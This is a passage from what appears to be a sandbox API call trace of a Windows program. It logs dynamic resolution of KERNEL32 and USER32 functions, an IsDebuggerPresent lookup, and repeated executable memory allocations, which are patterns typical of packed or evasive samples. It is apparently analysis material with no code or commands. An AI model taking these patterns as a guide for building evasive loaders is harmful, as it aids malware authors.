1 [0133.899] VirtualFree (lpAddress=0x35d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.900] VirtualFree (lpAddress=0x35d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.901] VirtualFree (lpAddress=0x35d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.067] VirtualFree (lpAddress=0x35d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.069] VirtualFree (lpAddress=0x35d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.070] VirtualFree (lpAddress=0x35d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.072] VirtualFree (lpAddress=0x35d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.073] VirtualFree (lpAddress=0x35d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.074] VirtualFree (lpAddress=0x35d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.075] VirtualFree (lpAddress=0x35d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.385] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0134.386] GetProcAddress (hModule=0x769b0000, lpProcName="GetSystemInfo") returned 0x769c4982 [0134.386] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0134.387] GetProcAddress (hModule=0x769b0000, lpProcName="GetModuleHandleA") returned 0x769c1245 [0134.388] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0134.388] GetProcAddress (hModule=0x769b0000, lpProcName="GetModuleHandleW") returned 0x769c3460 [0134.389] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0134.390] GetProcAddress (hModule=0x769b0000, lpProcName="GetProcAddress") returned 0x769c1222 [0134.390] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0134.391] GetProcAddress (hModule=0x769b0000, lpProcName="LoadResource") returned 0x769c5904 [0134.391] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0134.391] GetProcAddress (hModule=0x769b0000, lpProcName="LockResource") returned 0x769c5911 [0134.392] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0134.392] GetProcAddress (hModule=0x769b0000, lpProcName="SizeofResource") returned 0x769c5a81 [0134.392] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0134.393] GetProcAddress (hModule=0x769b0000, lpProcName="FindResourceW") returned 0x769c5929 [0134.393] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0134.394] GetProcAddress (hModule=0x769b0000, lpProcName="FreeConsole") returned 0x76a67070 [0134.394] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0134.395] GetProcAddress (hModule=0x769b0000, lpProcName="CreateFileW") returned 0x769c3f0c [0134.395] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0134.396] GetProcAddress (hModule=0x769b0000, lpProcName="HeapSize") returned 0x77a13002 [0134.396] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0134.397] GetProcAddress (hModule=0x769b0000, lpProcName="GetProcessHeap") returned 0x769c14c9 [0134.397] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0134.398] GetProcAddress (hModule=0x769b0000, lpProcName="SetStdHandle") returned 0x76a44aef [0134.398] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0134.399] GetProcAddress (hModule=0x769b0000, lpProcName="WideCharToMultiByte") returned 0x769c16ed [0134.399] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0134.400] GetProcAddress (hModule=0x769b0000, lpProcName="EnterCriticalSection") returned 0x77a022b0 [0134.401] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0134.401] GetProcAddress (hModule=0x769b0000, lpProcName="LeaveCriticalSection") returned 0x77a02270 [0134.401] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0134.402] GetProcAddress (hModule=0x769b0000, lpProcName="InitializeCriticalSectionEx") returned 0x769c4ce0 [0134.402] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0134.403] GetProcAddress (hModule=0x769b0000, lpProcName="DeleteCriticalSection") returned 0x77a145f5 [0134.403] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0134.404] GetProcAddress (hModule=0x769b0000, lpProcName="EncodePointer") returned 0x77a20fcb [0134.404] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0134.405] GetProcAddress (hModule=0x769b0000, lpProcName="DecodePointer") returned 0x77a19d35 [0134.405] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0134.406] GetProcAddress (hModule=0x769b0000, lpProcName="MultiByteToWideChar") returned 0x769c190e [0134.406] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0134.407] GetProcAddress (hModule=0x769b0000, lpProcName="LCMapStringEx") returned 0x76a44d91 [0134.407] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0134.409] GetProcAddress (hModule=0x769b0000, lpProcName="GetStringTypeW") returned 0x769c1926 [0134.409] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0134.410] GetProcAddress (hModule=0x769b0000, lpProcName="GetCPInfo") returned 0x769c5141 [0134.410] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0134.411] GetProcAddress (hModule=0x769b0000, lpProcName="QueryPerformanceCounter") returned 0x769c1705 [0134.411] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0134.412] GetProcAddress (hModule=0x769b0000, lpProcName="GetCurrentProcessId") returned 0x769c11f8 [0134.412] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0134.413] GetProcAddress (hModule=0x769b0000, lpProcName="GetCurrentThreadId") returned 0x769c1430 [0134.413] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0134.414] GetProcAddress (hModule=0x769b0000, lpProcName="GetSystemTimeAsFileTime") returned 0x769c34b9 [0134.414] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0134.415] GetProcAddress (hModule=0x769b0000, lpProcName="InitializeSListHead") returned 0x77a194a4 [0134.415] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0134.416] GetProcAddress (hModule=0x769b0000, lpProcName="IsDebuggerPresent") returned 0x769c4a15 [0134.416] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0134.417] GetProcAddress (hModule=0x769b0000, lpProcName="UnhandledExceptionFilter") returned 0x769e76f7 [0134.417] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0134.418] GetProcAddress (hModule=0x769b0000, lpProcName="SetUnhandledExceptionFilter") returned 0x769c8781 [0134.418] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0134.421] GetProcAddress (hModule=0x769b0000, lpProcName="GetStartupInfoW") returned 0x769c4cf8 [0134.421] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0134.422] GetProcAddress (hModule=0x769b0000, lpProcName="IsProcessorFeaturePresent") returned 0x769c51ed [0134.422] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0134.423] GetProcAddress (hModule=0x769b0000, lpProcName="GetCurrentProcess") returned 0x769c17e9 [0134.423] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0134.424] GetProcAddress (hModule=0x769b0000, lpProcName="TerminateProcess") returned 0x769dd7d2 [0134.424] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0134.425] GetProcAddress (hModule=0x769b0000, lpProcName="RaiseException") returned 0x769c585e [0134.425] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0134.426] GetProcAddress (hModule=0x769b0000, lpProcName="RtlUnwind") returned 0x769ed1b3 [0134.426] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0134.427] GetProcAddress (hModule=0x769b0000, lpProcName="GetLastError") returned 0x769c11c0 [0134.427] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0134.428] GetProcAddress (hModule=0x769b0000, lpProcName="SetLastError") returned 0x769c11a9 [0134.428] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0134.429] GetProcAddress (hModule=0x769b0000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x769c18f6 [0134.429] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0134.430] GetProcAddress (hModule=0x769b0000, lpProcName="TlsAlloc") returned 0x769c4965 [0134.430] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0134.431] GetProcAddress (hModule=0x769b0000, lpProcName="TlsGetValue") returned 0x769c11e0 [0134.431] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0134.432] GetProcAddress (hModule=0x769b0000, lpProcName="TlsSetValue") returned 0x769c14db [0134.432] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0134.433] GetProcAddress (hModule=0x769b0000, lpProcName="TlsFree") returned 0x769c3537 [0134.433] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0134.434] GetProcAddress (hModule=0x769b0000, lpProcName="FreeLibrary") returned 0x769c3478 [0134.434] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0134.435] GetProcAddress (hModule=0x769b0000, lpProcName="LoadLibraryExW") returned 0x769c4915 [0134.435] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0134.436] GetProcAddress (hModule=0x769b0000, lpProcName="GetStdHandle") returned 0x769c516b [0134.436] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0134.437] GetProcAddress (hModule=0x769b0000, lpProcName="WriteFile") returned 0x769c1282 [0134.437] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0134.438] GetProcAddress (hModule=0x769b0000, lpProcName="GetModuleFileNameW") returned 0x769c4908 [0134.438] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0134.439] GetProcAddress (hModule=0x769b0000, lpProcName="ExitProcess") returned 0x769c79c8 [0134.439] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0134.440] GetProcAddress (hModule=0x769b0000, lpProcName="GetModuleHandleExW") returned 0x769c4a27 [0134.440] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0134.441] GetProcAddress (hModule=0x769b0000, lpProcName="GetCommandLineA") returned 0x769c5159 [0134.441] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0134.442] GetProcAddress (hModule=0x769b0000, lpProcName="GetCommandLineW") returned 0x769c51db [0134.442] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0134.444] GetProcAddress (hModule=0x769b0000, lpProcName="HeapAlloc") returned 0x77a0e026 [0134.444] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0134.445] GetProcAddress (hModule=0x769b0000, lpProcName="HeapFree") returned 0x769c14a9 [0134.445] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0134.446] GetProcAddress (hModule=0x769b0000, lpProcName="CompareStringW") returned 0x769c3b7a [0134.446] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0134.447] GetProcAddress (hModule=0x769b0000, lpProcName="LCMapStringW") returned 0x769c1799 [0134.447] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0134.448] GetProcAddress (hModule=0x769b0000, lpProcName="GetLocaleInfoW") returned 0x769c3bf2 [0134.448] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0134.449] GetProcAddress (hModule=0x769b0000, lpProcName="IsValidLocale") returned 0x769dce1e [0134.449] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0134.450] GetProcAddress (hModule=0x769b0000, lpProcName="GetUserDefaultLCID") returned 0x769c3d55 [0134.450] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0134.451] GetProcAddress (hModule=0x769b0000, lpProcName="EnumSystemLocalesW") returned 0x76a447ff [0134.451] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0134.452] GetProcAddress (hModule=0x769b0000, lpProcName="GetFileType") returned 0x769c34e1 [0134.452] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0134.453] GetProcAddress (hModule=0x769b0000, lpProcName="CloseHandle") returned 0x769c13f0 [0134.453] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0134.454] GetProcAddress (hModule=0x769b0000, lpProcName="FlushFileBuffers") returned 0x769c4653 [0134.454] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0134.455] GetProcAddress (hModule=0x769b0000, lpProcName="GetConsoleOutputCP") returned 0x769d9ae7 [0134.455] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0134.456] GetProcAddress (hModule=0x769b0000, lpProcName="GetConsoleMode") returned 0x769c1328 [0134.456] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0134.457] GetProcAddress (hModule=0x769b0000, lpProcName="ReadFile") returned 0x769c3e83 [0134.457] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0134.458] GetProcAddress (hModule=0x769b0000, lpProcName="GetFileSizeEx") returned 0x769c599a [0134.458] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0134.459] GetProcAddress (hModule=0x769b0000, lpProcName="SetFilePointerEx") returned 0x769dc7df [0134.459] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0134.460] GetProcAddress (hModule=0x769b0000, lpProcName="ReadConsoleW") returned 0x76a67962 [0134.460] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0134.461] GetProcAddress (hModule=0x769b0000, lpProcName="HeapReAlloc") returned 0x77a21f6e [0134.462] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0134.462] GetProcAddress (hModule=0x769b0000, lpProcName="FindClose") returned 0x769c43fa [0134.462] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0134.463] GetProcAddress (hModule=0x769b0000, lpProcName="FindFirstFileExW") returned 0x769d17c9 [0134.463] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0134.464] GetProcAddress (hModule=0x769b0000, lpProcName="FindNextFileW") returned 0x769c54a6 [0134.464] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0134.466] GetProcAddress (hModule=0x769b0000, lpProcName="IsValidCodePage") returned 0x769c444b [0134.466] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0134.467] GetProcAddress (hModule=0x769b0000, lpProcName="GetACP") returned 0x769c177c [0134.467] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0134.468] GetProcAddress (hModule=0x769b0000, lpProcName="GetOEMCP") returned 0x769ed191 [0134.468] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0134.469] GetProcAddress (hModule=0x769b0000, lpProcName="GetEnvironmentStringsW") returned 0x769c519b [0134.469] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0134.470] GetProcAddress (hModule=0x769b0000, lpProcName="FreeEnvironmentStringsW") returned 0x769c5183 [0134.470] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0134.471] GetProcAddress (hModule=0x769b0000, lpProcName="SetEnvironmentVariableW") returned 0x769c89a9 [0134.471] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0134.472] GetProcAddress (hModule=0x769b0000, lpProcName="WriteConsoleW") returned 0x769e7a92 [0134.472] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x773b0000 [0134.473] GetProcAddress (hModule=0x773b0000, lpProcName="SendNotifyMessageA") returned 0x77426d5d [0134.473] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x773b0000 [0134.474] GetProcAddress (hModule=0x773b0000, lpProcName="SendMessageCallbackA") returned 0x77426cfc [0134.474] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x769b0000 [0134.475] GetProcAddress (hModule=0x769b0000, lpProcName="LocalAlloc") returned 0x769c166c [0134.475] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x769b0000 [0134.476] GetProcAddress (hModule=0x769b0000, lpProcName="LocalFree") returned 0x769c2cec [0134.476] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x769b0000 [0134.477] GetProcAddress (hModule=0x769b0000, lpProcName="GetModuleFileNameW") returned 0x769c4908 [0134.477] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x769b0000 [0134.478] GetProcAddress (hModule=0x769b0000, lpProcName="GetProcessAffinityMask") returned 0x769ca829 [0134.478] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x769b0000 [0134.479] GetProcAddress (hModule=0x769b0000, lpProcName="SetProcessAffinityMask") returned 0x76a434dc [0134.479] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x769b0000 [0134.480] GetProcAddress (hModule=0x769b0000, lpProcName="SetThreadAffinityMask") returned 0x769e0570 [0134.480] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x769b0000 [0134.481] GetProcAddress (hModule=0x769b0000, lpProcName="Sleep") returned 0x769c10ff [0134.481] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x769b0000 [0134.482] GetProcAddress (hModule=0x769b0000, lpProcName="ExitProcess") returned 0x769c79c8 [0134.482] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x769b0000 [0134.483] GetProcAddress (hModule=0x769b0000, lpProcName="FreeLibrary") returned 0x769c3478 [0134.483] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x769b0000 [0134.484] GetProcAddress (hModule=0x769b0000, lpProcName="LoadLibraryA") returned 0x769c498f [0134.484] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x769b0000 [0134.485] GetProcAddress (hModule=0x769b0000, lpProcName="GetModuleHandleA") returned 0x769c1245 [0134.485] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x769b0000 [0134.486] GetProcAddress (hModule=0x769b0000, lpProcName="GetProcAddress") returned 0x769c1222 [0134.486] LoadLibraryA (lpLibFileName="user32.dll") returned 0x773b0000 [0134.487] GetProcAddress (hModule=0x773b0000, lpProcName="GetProcessWindowStation") returned 0x773c9eea [0134.487] LoadLibraryA (lpLibFileName="user32.dll") returned 0x773b0000 [0134.488] GetProcAddress (hModule=0x773b0000, lpProcName="GetUserObjectInformationW") returned 0x773c8068 [0134.489] VirtualFree (lpAddress=0x35c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.490] VirtualFree (lpAddress=0x35c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.491] VirtualFree (lpAddress=0x35c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.492] VirtualFree (lpAddress=0x35c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.494] VirtualFree (lpAddress=0x35c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.495] VirtualFree (lpAddress=0x35c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.496] VirtualFree (lpAddress=0x35c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.498] VirtualFree (lpAddress=0x35c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.500] VirtualFree (lpAddress=0x35c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.501] VirtualFree (lpAddress=0x35c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.502] VirtualFree (lpAddress=0x35c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.503] VirtualFree (lpAddress=0x35c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.504] VirtualFree (lpAddress=0x35c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.505] VirtualFree (lpAddress=0x35c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.506] VirtualFree (lpAddress=0x35c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.507] VirtualFree (lpAddress=0x35c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.509] VirtualFree (lpAddress=0x35c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.510] VirtualFree (lpAddress=0x35c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.511] VirtualFree (lpAddress=0x35c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.546] VirtualFree (lpAddress=0x35c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.547] GetCurrentProcessId () returned 0xeb4 [0134.547] GetCurrentProcessId () returned 0xeb4 [0134.547] GetCurrentProcessId () returned 0xeb4 [0134.547] GetCurrentProcessId () returned 0xeb4 [0134.547] GetCurrentProcessId () returned 0xeb4 [0134.547] GetCurrentProcessId () returned 0xeb4 [0134.547] GetCurrentProcessId () returned 0xeb4 [0134.547] GetCurrentProcessId () returned 0xeb4 [0134.547] GetCurrentProcessId () returned 0xeb4 [0134.547] GetCurrentProcessId () returned 0xeb4 [0134.547] GetCurrentProcessId () returned 0xeb4 [0134.547] GetCurrentProcessId () returned 0xeb4 [0134.547] GetCurrentProcessId () returned 0xeb4 [0134.547] GetCurrentProcessId () returned 0xeb4 [0134.547] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x35c0000 [0134.553] VirtualFree (lpAddress=0x35c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.555] GetCurrentProcessId () returned 0xeb4 [0134.555] GetCurrentProcessId () returned 0xeb4 [0134.555] GetCurrentProcessId () returned 0xeb4 [0134.555] GetCurrentProcessId () returned 0xeb4 [0134.555] GetCurrentProcessId () returned 0xeb4 [0134.555] GetCurrentProcessId () returned 0xeb4 [0134.555] GetCurrentProcessId () returned 0xeb4 [0134.555] GetCurrentProcessId () returned 0xeb4 [0134.555] GetCurrentProcessId () returned 0xeb4 [0134.555] GetCurrentProcessId () returned 0xeb4 [0134.555] GetCurrentProcessId () returned 0xeb4 [0134.555] GetCurrentProcessId () returned 0xeb4 [0134.555] GetCurrentProcessId () returned 0xeb4 [0134.555] GetCurrentProcessId () returned 0xeb4 [0134.555] GetCurrentProcessId () returned 0xeb4 [0134.556] GetCurrentProcessId () returned 0xeb4 [0134.556] GetCurrentProcessId () returned 0xeb4 [0134.556] GetCurrentProcessId () returned 0xeb4 [0134.556] GetCurrentProcessId () returned 0xeb4 [0134.556] GetCurrentProcessId () returned 0xeb4 [0134.556] GetCurrentProcessId () returned 0xeb4 [0134.556] GetCurrentProcessId () returned 0xeb4 [0134.556] GetCurrentProcessId () returned 0xeb4 [0134.556] GetCurrentProcessId () returned 0xeb4 [0134.556] GetCurrentProcessId () returned 0xeb4 [0134.556] GetCurrentProcessId () returned 0xeb4 [0134.556] GetCurrentProcessId () returned 0xeb4 [0134.556] GetCurrentProcessId () returned 0xeb4 [0134.556] GetCurrentProcessId () returned 0xeb4 [0134.556] GetCurrentProcessId () returned 0xeb4 [0134.556] GetCurrentProcessId () returned 0xeb4 [0134.556] GetCurrentProcessId () returned 0xeb4 [0134.556] GetCurrentProcessId () returned 0xeb4 [0134.556] GetCurrentProcessId () returned 0xeb4 [0134.556] GetCurrentProcessId () returned 0xeb4 [0134.556] GetCurrentProcessId () returned 0xeb4 [0134.557] GetCurrentProcessId () returned 0xeb4 [0134.557] GetCurrentProcessId () returned 0xeb4 [0134.557] GetCurrentProcessId () returned 0xeb4 [0134.557] GetCurrentProcessId () returned 0xeb4 [0134.557] GetCurrentProcessId () returned 0xeb4 [0134.557] GetCurrentProcessId () returned 0xeb4 [0134.557] GetCurrentProcessId () returned 0xeb4 [0134.557] GetCurrentProcessId () returned 0xeb4 [0134.557] GetCurrentProcessId () returned 0xeb4 [0134.557] GetCurrentProcessId () returned 0xeb4 [0134.557] GetCurrentProcessId () returned 0xeb4 [0134.557] GetCurrentProcessId () returned 0xeb4 [0134.557] GetCurrentProcessId () returned 0xeb4 [0134.557] GetCurrentProcessId () returned 0xeb4 [0134.557] GetCurrentProcessId () returned 0xeb4 [0134.557] GetCurrentProcessId () returned 0xeb4 [0134.557] GetCurrentProcessId () returned 0xeb4 [0134.557] GetCurrentProcessId () returned 0xeb4 [0134.557] GetCurrentProcessId () returned 0xeb4 [0134.557] GetCurrentProcessId () returned 0xeb4 [0134.557] GetCurrentProcessId () returned 0xeb4 [0134.557] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x35c0000 [0134.560] VirtualFree (lpAddress=0x35c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.561] GetCurrentProcessId () returned 0xeb4 [0134.561] GetCurrentProcessId () returned 0xeb4 [0134.562] GetCurrentProcessId () returned 0xeb4 [0134.562] GetCurrentProcessId () returned 0xeb4 [0134.562] GetCurrentProcessId () returned 0xeb4 [0134.562] GetCurrentProcessId () returned 0xeb4 [0134.562] GetCurrentProcessId () returned 0xeb4 [0134.562] GetCurrentProcessId () returned 0xeb4 [0134.562] GetCurrentProcessId () returned 0xeb4 [0134.562] GetCurrentProcessId () returned 0xeb4 [0134.562] GetCurrentProcessId () returned 0xeb4 [0134.562] GetCurrentProcessId () returned 0xeb4 [0134.562] GetCurrentProcessId () returned 0xeb4 [0134.562] GetCurrentProcessId () returned 0xeb4 [0134.562] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x35c0000 [0134.563] VirtualFree (lpAddress=0x35c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.565] GetCurrentProcessId () returned 0xeb4 [0134.565] GetCurrentProcessId () returned 0xeb4 [0134.565] GetCurrentProcessId () returned 0xeb4 [0134.565] GetCurrentProcessId () returned 0xeb4 [0134.565] GetCurrentProcessId () returned 0xeb4 [0134.565] GetCurrentProcessId () returned 0xeb4 [0134.565] GetCurrentProcessId () returned 0xeb4 [0134.565] GetCurrentProcessId () returned 0xeb4 [0134.565] GetCurrentProcessId () returned 0xeb4 [0134.565] GetCurrentProcessId () returned 0xeb4 [0134.565] GetCurrentProcessId () returned 0xeb4 [0134.565] GetCurrentProcessId () returned 0xeb4 [0134.565] GetCurrentProcessId () returned 0xeb4 [0134.565] GetCurrentProcessId () returned 0xeb4 [0134.565] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x35c0000 [0134.566] VirtualFree (lpAddress=0x35c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.568] GetCurrentProcessId () returned 0xeb4 [0134.568] GetCurrentProcessId () returned 0xeb4 [0134.568] GetCurrentProcessId () returned 0xeb4 [0134.568] GetCurrentProcessId () returned 0xeb4 [0134.568] GetCurrentProcessId () returned 0xeb4 [0134.568] GetCurrentProcessId () returned 0xeb4 [0134.568] GetCurrentProcessId () returned 0xeb4 [0134.568] GetCurrentProcessId () returned 0xeb4 [0134.568] GetCurrentProcessId () returned 0xeb4 [0134.568] GetCurrentProcessId () returned 0xeb4 [0134.568] GetCurrentProcessId () returned 0xeb4 [0134.568] GetCurrentProcessId () returned 0xeb4 [0134.568] GetCurrentProcessId () returned 0xeb4 [0134.568] GetCurrentProcessId () returned 0xeb4 [0134.568] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x35c0000 [0134.569] VirtualFree (lpAddress=0x35c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.570] GetCurrentProcessId () returned 0xeb4 [0134.570] GetCurrentProcessId () returned 0xeb4 [0134.570] GetCurrentProcessId () returned 0xeb4 [0134.570] GetCurrentProcessId () returned 0xeb4 [0134.570] GetCurrentProcessId () returned 0xeb4 [0134.570] GetCurrentProcessId () returned 0xeb4 [0134.570] GetCurrentProcessId () returned 0xeb4 [0134.570] GetCurrentProcessId () returned 0xeb4 [0134.570] GetCurrentProcessId () returned 0xeb4 [0134.570] GetCurrentProcessId () returned 0xeb4 [0134.571] GetCurrentProcessId () returned 0xeb4 [0134.571] GetCurrentProcessId () returned 0xeb4 [0134.571] GetCurrentProcessId () returned 0xeb4 [0134.571] GetCurrentProcessId () returned 0xeb4 [0134.571] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x35c0000 [0134.572] VirtualFree (lpAddress=0x35c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.573] GetCurrentProcessId () returned 0xeb4 [0134.573] GetCurrentProcessId () returned 0xeb4 [0134.573] GetCurrentProcessId () returned 0xeb4 [0134.573] GetCurrentProcessId () returned 0xeb4 [0134.573] GetCurrentProcessId () returned 0xeb4 [0134.573] GetCurrentProcessId () returned 0xeb4 [0134.573] GetCurrentProcessId () returned 0xeb4 [0134.573] GetCurrentProcessId () returned 0xeb4 [0134.573] GetCurrentProcessId () returned 0xeb4 [0134.573] GetCurrentProcessId () returned 0xeb4 [0134.573] GetCurrentProcessId () returned 0xeb4 [0134.573] 